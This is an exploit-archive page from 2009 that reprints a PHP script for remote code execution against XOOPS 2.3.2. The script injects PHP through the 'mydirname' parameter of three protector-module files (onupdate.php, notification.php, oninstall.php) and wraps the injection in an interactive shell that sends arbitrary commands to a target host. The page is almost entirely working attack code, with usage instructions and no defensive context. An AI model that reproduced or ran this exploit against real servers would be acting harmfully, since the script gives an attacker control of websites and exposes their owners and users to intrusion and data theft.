Home / os / win10

xoops232-exec.txt

Posted on 08 January 2009

#!/usr/bin/php -q
<?php

/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
* by athos - staker[at]hotmail[dot]it                          *
* http://xoops.org                                             *
*                                                              *
* thanks to s3rg3770 and The:Paradox                           *
*                                                              *
* works with register globals on                               *
* note: this vuln is a remote php code execution               *
*                                                              *
* Directory (xoops_lib/modules/protector/)                     *
* onupdate.php?mydirname=a(){} [PHP CODE] function v           *
* oninstall.php?mydirname=a(){} [PHP CODE] function v          *
* notification.php?mydirname=a(){} [PHP CODE] function v       *
****************************************************************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {

print "
+--------------------------------------------------------------+
";
print "
| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |
";
print "
+--------------------------------------------------------------+
";
print "
by athos - staker[at]hotmail[dot]it / http://xoops.org
";
print "
Usage: php xpl.php [host] [path]

";
print "
host     + localhost
";
print "
path     + /XOOPS
";
exit;
}

exploit();

function exploit() {

global $num;

if ($num > 3) {
die("
$num isn't a valid option
");
}
else {
yeat_shell();
}
}


function yeat_shell() {

while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("
Exited
");
if (preg_match('/^(help|--help)$/i',$exec)) echo("
Example: uname -a
");
if (preg_match('/^(about|--about)$/i',$exec)) echo("
staker[at]hotmail[dot]it
");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path,$num;

if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}

if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}

if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}

$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1
";
$data .= "Host: {$host}
";
$data .= "User-Agent: Lynx (textmode)
";
$data .= "Connection: close

";

$html = data_send ($host,$data);

return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!
");
}   fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}

 

TOP

Malware :

Exploits :